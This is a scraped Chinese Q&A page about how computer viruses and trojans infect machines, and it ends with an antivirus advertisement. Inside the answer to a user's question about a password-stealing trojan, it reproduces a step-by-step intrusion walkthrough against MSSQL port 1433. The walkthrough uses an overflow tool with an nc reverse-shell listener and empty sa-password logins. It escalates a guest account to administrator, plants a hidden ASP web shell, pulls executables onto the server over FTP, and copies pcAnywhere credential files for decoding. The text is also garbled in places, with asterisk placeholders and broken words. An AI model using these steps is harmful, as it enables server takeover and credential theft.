文章大纲：

• 1、简述计算机病毒是怎么入侵计算机的
• 2、木马病毒通常是怎样侵入电脑系统的？
• 3、盗传奇密码的木马病毒是怎么侵入电脑的？
• 4、木马入侵步骤
• 5、木马病毒是怎么入侵电脑系统的

简述计算机病毒是怎么入侵计算机的

一般计算机病毒的入侵都是有一定的规律性的，计算机病毒常用以下几种方式入侵我们的计算机：

利用操作系统漏洞传播病毒 利用操作系统存在的安全漏洞来进行攻击你的计算机，比如冲击波，震荡波。例如您的计算机感染冲击波病毒后，计算机就会弹出一个对话框，提示“您的计算机将在 1分钟内关闭”，然后便开始 1分钟倒计时，计时完毕后您的计算机就会自动关闭。

通过电子邮件传播病毒 通过电子邮件传播病毒也是比较常见的一种病毒传播方式。通常会有 邮件会以提示中奖，免费下载等诱人消息提示的方式诱骗用户打开邮件附件或带有病毒的网站，以达到使病毒入侵计算机的目的。最常见的就是病毒发送大量垃圾邮件，造成企业邮件服务器瘫痪，网速减慢。有些病毒还会删除系统文件，篡改系统注册表，导致计算机不能正常工作。

通过网站下载传播病毒 通常会有一些提供音乐，视频等点击率较高的网站，或提供色情，反动宣传资料下载等不健康网站中被病毒传播者们利用，利用这些点击率较高的网页来达到更好的病毒传播目的。

通过即时通讯工具传播病毒

有很多木马病毒，较为常见的如：“ *** 尾巴”病毒都是通过OICQ来传播的。常见的就是当你感染病毒后，在你用OICQ， ICQ，MSN等工具给对方发送一条信息的时候，系统会自动的给对方发送一条有病毒潜伏的网页地址，或发送一个文件。而你却看不到这条信息，对方点击此链接地址，或打开运行此文件时，很可能就会被感染。

通过感染文件传播 CIH 、Funlove等病毒都是通过感染Windows可执行文件（PE格式文件）进行传播，通常被这类病毒感染的系统运行会比较缓慢，并且一些大的自解压缩文件也可能被这种病毒破坏而无法打开。

通过其他方式进行感染 如通过引导区、移动存储设备等进行传播。

木马病毒通常是怎样侵入电脑系统的？

通过 *** 主动攻击入侵 通过 *** 下载,安装 通过移动存储(U盘等)侵入 自己在电脑里 ***

盗传奇密码的木马病毒是怎么侵入电脑的？

分类: 电脑/ *** 反病毒

问题描述:

我用江民杀毒 时时监控 打开了放火墙

用专门杀这病毒的软件也杀了不少！

可每次还是会侵入电脑，是什么途径进入电脑的？

怎么彻底杀完？

最关键的是怎么才能防止它侵入我电脑？

就因为这病毒我都从做过2次系统了！

病毒一出现征兆就是我的电脑的声卡驱动就失灵了

帮帮忙啊！高手

解析:

可以通过1433和3389的端口,请关闭他们.还有可能你中了免杀的远程控制工具.1433这样入侵

在win2000机器上装了mssql的话，机器就会开1433端口。什么是端口，就像食堂买菜的窗口一样，你买白菜上1号窗，买西红柿上2号窗。在机器上买mssql就上1433窗。溢出1433需要两个工具:nc.exe和sql2.exesandflee都有下载。进攻 *** 就两步：之一步，在自己机器上开一个cmd窗口。对了，你要用win2000的话，就开始－运行－写入cmd回车。这里我们只用2000，不说98。如果你把你下的nc.exe和sql2.exe和我习惯一样放在c:盘的话，就在你开的这个窗口下打入命令c:nc -l -p 40回车。这步的意思是用nc这个工具开一个40的端口监听。第二步：再在开始－运行－写入cmd回车，再开一个窗口。在这个窗口写命令行c:sql2.exe 你要入侵网站的ip 自己的ip 40 0回车。这里要作点说明：如何得到入侵网站ip?在cmd下c:pinxxxxx就可以看到了。自己的ip呢？在cmd下c:ipconfig就可以看到了。其中命令行中的40你可以随意改成别的，但好像40和53成功率高一点。再是命令中的0不行的话，你就试试1或2。如果入侵网站有这个漏洞话，那么你开的之一个窗口就会变成肉鸡的c:\winnt\system32.就是说，你已经进入它的机器里了。进去以后，你可以填加个用户了。 user guest /active:yes用这个命令，就将默认禁止的guest用户激活。 user guest 123456这样guest的密码变成123456了。 localgroup administrators guest /add这就是guest成为更高权限的管理员了。

第二：1433空密码入侵。1433还有一个漏洞，就是如果默认安装的话，用户名是sa,密码是空的。那么我们就可以用supersqlexec.exe连接上去，这东sandflee也有下。看看入侵 *** ，我以前在小榕论坛贴的：lcx的win98下sa空密码入侵脚本20步

1.如何找到sa空密码肉鸡？自己用流光扫吧。

2.注意这是在win98下入侵sa的真实情况。局域网中的win98，在网吧里。

3.工具：supersqlexec.exe、cmd.asp(sandflee有下)海阳顶端网木马(黑白)放在本机f:盘

4.用supersqlexec联接成功。在命令行中输入:

user guest /active:yes

（指肉鸡回显下同）The mand pleted successfully.

user guest 123456

The mand pleted successfully

localgroup administrators guest /add

The mand pleted successfully.

这几个命令做完后，意思是将guest用户激活，密码是123456，并提升为admin。又是这个命令，复习一下。

5.心中暗喜，换到2000系统下启动流光的种植者给它种个冰河。奇怪了，无论如何也不成功。(其实有时流光种植者不成功，但用手工 *** 就可以,是这样的，看这里)。

6.换个用户名吧。回到supersqlexe.exe的命令模式 user lcx 123456 /add，命令失败。服务器没开 ipc$?

7.回到sqlexe命令行中 start lanmanserver肉鸡却显示ipc$已启动。为何在这一步流光联不上，我百思 不得其解。(注： start命令列表) 我后来换wn2000的cmd下 use \\ip\ipc$ "123456" /user:"guest"也不能联接成功。

8.换个思路吧。在本机上将f:设为共享,在dos下ipconfig.exe得知自己本机ip

9.回到sqlexe命令行中 use x: \\本机ip\f，将自己本机f：盘映射成为肉鸡的x:盘。过了一会，服务器 显示命令成功完成。(lcx注：命令的详细用法)

10.sqlexe命令行中运行set得知其主页位置在d:\ipub\root。不错，服务器支持asp.你如果看不懂这 个命令，也可以根据其主页上某个图像文件名，然后dir */s查找其主页位置。

11.sqlexe命令行中copy x:\cmd.asp d:\ipub\root，这个目录是肉鸡网站的目录。

12.回到ie中服务器ip/cmd.asp，出现了ie界面的dos.建个文件夹看看。

md d:\ipub\root\aspmm

13.sqlexec命令行中copy x:\海阳顶端网木马\*.* d:\ipub\root\aspmm\.再将目录隐藏

attrib +h d:\ipub\root\aspmm

14.现在你可以用海阳顶端网木马上传任意文件了。完全控制了肉鸡的文本文件。当然你也可以通过映射来 copy.呀！这台服务器不支持fso，海阳顶端网木马无法运行。那么我们试一下ftp上传。先将自己的文件*.exe上传到个人主页空间。

15.在自己本机上建立up.txt内容如下：

open ftp1.go.163(说明：这里是指我用得是网易ftp)

username(说明：你的上传用户名)

password(说明：密码)

get lcx.exe(说明：你要上传到肉鸡的文件名)

bye(说明：退出ftp)

通过映射copy到肉鸡的c:\up.txt

16.sqlexec命令行中ftp -s:c:\up.txt(注：ftp的用法你在win2000里的帮助里可以很详细查到)等一会你 就看到lcx.exe已经在肉鸡在\winnt\system32\下了。

17.运气好的话应该可以ipc联接成功，开个端口进去的。然后就可以做个 *** 、做个跳板了，可惜我运气 不好，这台机器无法ipc$成功，流光种植者无法联接。上传了好几个exe木马也无法运行。如何运行你上 传的木马，就看第二节

18. 通过仔细查找，得知肉鸡装了pcanywhere.查*.cif，该文件却在C:/WINNT/Profiles/All Users/Application Data/Symantec/pcAnywhere这里，好深的目录。怎样copy它呢？

19.通过一天的dos8.3规则的补习才知应是这样 ：

copy c:\winnt\Profiles\alluse~1\applic~2\symantec\pcanyw~1\*.cif d:\ipub\root\.然后通过 ie下载。其实，也可以用asp写一个小程序copy.我这儿写了一个。我放在这里了。说明：

s8s8/cgi-bin/topic.cgi?forum=26topic=741

20.流光cif文件解码，得知用户名和密码。唯一遗憾的是ipc$无法成功，无法开端口进去，guest用户却可 以激活不知什么原因。

其实用supersqlexec.exe连上以后，可以有很多 *** 。像还可以用echo写我在第15步提到的那个up.txt.

echo 你要写的 up.txt就可以了，虽然肉鸡回显说写失败，其实已经成功了。就像一个人喊捉贼，贼吓跑了，家里却早乱了。注意，你用echo一次只可写一行。还有3389,他可以远程查看你的桌面.china/neork/2/2005/close-port-11325344601870.s

你还要看看一些可疑进程.

木马入侵步骤

应该首先是破坏防火墙，往系统文件注入木马病毒，然后获取电脑信息

如果装有杀毒软件，先破坏防火墙，然后关闭或者下卸杀毒软件……

木马病毒是怎么入侵电脑系统的

首先，先跟你解释下什么叫木马：通过入侵电脑（比如网页、文件、漏洞等），伺机DAO取账号密码的恶意程序，它是电脑病毒中一种。通常木马会自动运行，在你的上网过程中，如果登录网yin、聊天账号等，你的个人

安全信息都会被QIE取，从而导致用户账号被dao用、CAI产遭受损失。

推荐试试腾讯电脑管家，它是免费专业安全软件，杀毒管理二合一(只需要下载一份），占内存小，杀毒好，防护好，无误报误杀。拥有云查杀引擎、反病毒引擎、金山云查杀引擎、AVIRA查

杀引擎、小红伞和查杀修复引擎等世界一流杀毒软件内嵌杀毒引擎！保证杀毒质量。如果遇到顽固木马，可用首页——工具箱——顽固木马克星，强力查杀，效果相当不错的。

建议你在用杀毒软件检测出木马病毒后，之一时间进行清除。一般当扫描出木马后，都会帮您勾选所有木马，只需要点击“立即清除”就可以了。有些木马需要重启电脑，为了彻底清除危害

千万不要嫌麻烦哦。